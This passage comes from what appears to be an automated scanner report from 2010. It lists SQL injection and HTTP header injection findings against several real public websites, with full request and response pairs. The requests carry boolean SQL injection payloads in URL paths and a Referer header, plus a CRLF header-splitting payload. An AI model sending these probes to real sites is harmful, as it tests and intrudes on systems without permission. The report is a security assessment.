   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+california+south-lake-tahoe+3+4828397937254'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ou3nqeh7iga9c77qnb1p8khtb3; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:26 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:26 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.6. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+hawaii+2+11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+hawaii+2+11

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 95733272'%20or%201%3d1--%20 and 95733272'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ne1hs9pfl2v073lbi6omn72d21; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:17 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23028

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Holiday Homes, Holiday Rentals, Israel</title>
   <meta name="keywords" content="San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Center Vacation Homes, Center Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+hawaii+2+1195733272'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ste731imj2i2967ve3jaca05g0; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:17 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22986

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.7. http://vacationrentals.mercurynews.com/vacation-rentals/united-states+nevada+las-vegas+3+1552 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vacationrentals.mercurynews.com
Path:   /vacation-rentals/united-states+nevada+las-vegas+3+1552

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 15259239'%20or%201%3d1--%20 and 15259239'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d1--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=ttb986aq4h688eo7ugf6o3q151; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:19 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals, Provence, France</title>
   <meta name="keywords" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Roquemaure Vacation Homes, Roquemaure Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>

...[SNIP]...

Request 2

GET /vacation-rentals/united-states+nevada+las-vegas+3+155215259239'%20or%201%3d2--%20 HTTP/1.1
Host: vacationrentals.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 02:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Set-Cookie: PHPSESSID=71u2oka6m57riqbujql4c2doj7; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 02:10:22 GMT
Cache-Control: post-check=0, pre-check=0
Set-Cookie: pt=MERC%7C1114101810; expires=Tue, 15-Nov-2011 02:10:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals, , </title>
   <meta name="keywords" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Holiday Homes, Holiday Rentals"/>
   <meta name="description" content="San Jose Mercury News: Vacation Homes, Vacation Rentals, Villas, Estates, Cottages, Cabins, Condos, self-catering, Holiday Homes, Holiday Rentals"/>
   <meta name="copyright" content="Copyright &copy; 2010 Vacapedia, Inc.
All Rights Reserved."/>
<link href="/css/master.css" rel="stylesheet" type="text/css">
    <link href="/affiliates/merc/css/merc-new.css" rel="stylesheet" type="text/css">
        <script src="http://www.traveladvertising.com/Live/TanHeader.aspx?PlacementId=3" language="javascript" type="text/javascript"></script>
<script src="/affiliates/merc/js/ads_vars.js" type="text/javascript"></script>
<script type="text/javascript" src="http://e.yieldmanager.net/script.js" ></script>
</head>
<body id="vacation-rentals" class="merc yui-skin-sam">
<div id="main">
<div id="main-wrapper">
       <div id="header">
    <div id="ad-leader-board"><script type="text/javascript">
sr_adspace_id = 7728907;
sr_adspace_width = 728;
sr_adspace_height = 90;
sr_ad_new_window = true;
sr_adspace_type = "graphic";
</script>
<script type="text/javascript" src="http://ad.afy11.net/srad.js?azId=7728907">
</script></div> <div id="hdrlogo">
           <div id="logo"><a href="http://www.mercurynews.com"><img alt="" border="0" src="/affiliates/merc/images/merc-logo.gif" /></a></div>
<div id="hdrmsg"><h1>Advertise your vacation rental on Bay Area News Group and reach millions of travelers</h1></div> <div id="content-top-right"><a href="https://www.vacapedia.com/own-mgr/listing.php?aff=merc">Owners Sign In</a></div>
</div>
<div class="clearfix"></div>

...[SNIP]...

1.8. http://www.associatedcontent.com/article/6007620/pop_print.shtml [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.associatedcontent.com
Path:   /article/6007620/pop_print.shtml

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1 (redirected)

HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//">
<html>
<head>
<title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title>
<meta http-e
...[SNIP]...
<script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771239&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771239&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d1--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>

</head>
<body>

   <script type="text/javascript"><!--
   s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general";    s.campaign="";s.events="";s.products="";
       var s_code=s.t();if(s_code)document.write(s_code);
   s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32;    //--></script>
           <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/>
       </noscript>
   
   <!--[if IE 6]>
   <style type="text/css">
   html, body { height: 100%; overflow: hidden; background: #333; margin: 0; padding: 0; position: relative; }
   .minibar { position: absolute; }
   .minibar { bottom: -1px; }
   .minibar_content { position: relative; width: 100%; height: 100%; overflow: auto; background: #e6e3dc; border: 1px solid #e6e3dc; margin: 0; padding: 0; }
   </style>
   <script>var isIE6 = true;</script>
   <![endif]-->
<div id="page" class="minibar_conte
...[SNIP]...

Request 2

GET /article/6007620/pop_print.shtml?content_type=article&content_type_id=6007620 HTTP/1.1
Host: www.associatedcontent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: c=MTc0MTIyMjMyMTg3NzU3MzUx; ACSESS=bunc6586kdrk769qu85umchs65; cs=Ng%3D%3D;
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Sun, 14 Nov 2010 23:25:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//">
<html>
<head>
<title>Childhood Obesity News - San Francisco Law Limits Fast Food Toys - Associated Content - associatedcontent.com</title>
<meta http-e
...[SNIP]...
<script type="text/javascript" src="http://ads.associatedcontent.com/www/delivery/spcjs.php?id=1&source=&cb=174122232187771250&slice=-0-&dma=-618-&cty=-US-&content_type=article&content_type_id=6007620&category_id=5&site_id=1&key_page=174122232187771250&ac_url=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml&loc=http%3A%2F%2Fwww.associatedcontent.com%2Farticle%2F6007620%2Fpop_print.shtml%3Fcontent_type_id%3D6007620%26cat%3D5&referer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fhl%3Den%26q%3D%27%2520and%25201%253d2--%2520&zones=zone1%3D1%7Czone2%3D2%7Czone3%3D3%7Czone4%3D4%7Czone6%3D6%7Czone9%3D9%7Czone58%3D58&nz=1"></script>

</head>
<body>

   <script type="text/javascript"><!--
   s.pageName="www:article";s.pageType="";s.prop21="www";s.prop4="174122232187757351";s.prop5="350957";s.prop14="no";s.prop18="Childhood Obesity News - San Francisco Law Limits Fast Food Toys";s.prop19="6007620";s.prop20="article";s.prop22="1";s.prop23="1";s.prop24="US";s.prop25="TX";s.prop26="Houston TX";s.prop27="Houston";s.prop28="713";s.prop29="5";s.prop32="general";    s.campaign="";s.events="";s.products="";
       var s_code=s.t();if(s_code)document.write(s_code);
   s.linkTrackVars='prop30,prop31,prop33';if (s.prop20) s.prop30=s.prop20;if (s.prop29) s.prop31=s.prop29;s.prop33=s.prop32;    //--></script>
           <script type="text/javascript">_qoptions={qacct:"p-32Swj5sJwj0d6",labels:"Health"};</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
       <noscript>
       <img src="http://pixel.quantserve.com/pixel/p-32Swj5sJwj0d6.gif?labels="Health" style="display: none;" border="0" height="1" width="1"/>
       </noscript>
   
   <!--[if IE 6]>
   <style type="text/css">
   html, body { height: 100%; overflow: hidden; background: #333; margin: 0; padding: 0; position: relative; }
   .minibar { position: absolute; }
   .minibar { bottom: -1px; }
   .minibar_content { position: relative; width: 100%; height: 100%; overflow: auto; background: #e6e3dc; border: 1px solid #e6e3dc; margin: 0; padding: 0; }
   </style>
   <script>var isIE6 = true;</script>
   <![endif]-->
<div id="page" class="minibar_conte
...[SNIP]...

1.9. http://www.bing.com/fd/sa/0807035841/PostContent.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bing.com
Path:   /fd/sa/0807035841/PostContent.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fd/sa'/0807035841/PostContent.js HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.bing.com/search?q=sfo+news&src=IE-SearchBox&FORM=IE8SRC
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=96C2DF45871646C7B73393B23DF23548&TUID=1; SRCHD=MS=1510502&SM=1&D=1501491&AF=IE8SRC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20101108; _UR=OMW=1; _SS=SID=98F8B560F09546FCAFC915D0D1E309CD&hIm=400; OrigMUID=96C2DF45871646C7B73393B23DF23548%2c8acf7d1d80e14faaae51bf7f79853cd4; RMS=T=262656; SRCHUID=V=2&GUID=C83DE67312BC457AB03716003EB09140

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 316
Content-Type: text/xml; charset=utf-8
Date: Sun, 14 Nov 2010 23:27:27 GMT
Connection: close

<BingResponse xmlns="http://schemas.microsoft.com/bing/bdi"><ImpressionGuid>8f948b815559460c9783d2223273c71d</ImpressionGuid><EventId>A678F6DA3B92442CA24989549A190DE9</EventId><Errors><Error><Message>
...[SNIP]...

Request 2

GET /fd/sa''/0807035841/PostContent.js HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://www.bing.com/search?q=sfo+news&src=IE-SearchBox&FORM=IE8SRC
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.bing.com
Proxy-Connection: Keep-Alive
Cookie: MUID=96C2DF45871646C7B73393B23DF23548&TUID=1; SRCHD=MS=1510502&SM=1&D=1501491&AF=IE8SRC; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20101108; _UR=OMW=1; _SS=SID=98F8B560F09546FCAFC915D0D1E309CD&hIm=400; OrigMUID=96C2DF45871646C7B73393B23DF23548%2c8acf7d1d80e14faaae51bf7f79853cd4; RMS=T=262656; SRCHUID=V=2&GUID=C83DE67312BC457AB03716003EB09140

Response 2

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Content-Length: 10261
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Vary: Accept-Encoding
Date: Sun, 14 Nov 2010 23:27:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

2. HTTP header injection  previous  next
There are 8 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://111.xg4ken.com/media/redir.php [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://111.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the client request parameter is copied into the Location response header. The payload 7276c%0d%0a96ecccdd8a was submitted in the client parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=5047&camp=7457&affcode=kw1349&inhURL=&cid=5434193271&networkType=content&utm_source=google&utm_medium=cpc&utm_term=financial%20mba&utm_campaign=GoogleContent_Graduate&url[]=http%3A%2F%2Fusfca.edu%2Fbps%2Fgraduate%2FConcurrent_Degree_Programs%2FMSFA___MBA%2F&client=7276c%0d%0a96ecccdd8a HTTP/1.1
Host: 111.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 14 Nov 2010 23:04:42 GMT
Server: Apache
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=64ec9846-bb52-23a8-43c8-0000231d7fb3; expires=Sat, 12-Feb-2011 23:04:42 GMT; path=/; domain=.xg4ken.com
Location: http://usfca.edu/bps/graduate/Concurrent_Degree_Programs/MSFA___MBA/?utm_source=google&utm_medium=cpc&utm_term=financial mba&utm_campaign=GoogleContent_Graduate&client=7276c
96ecccdd8a

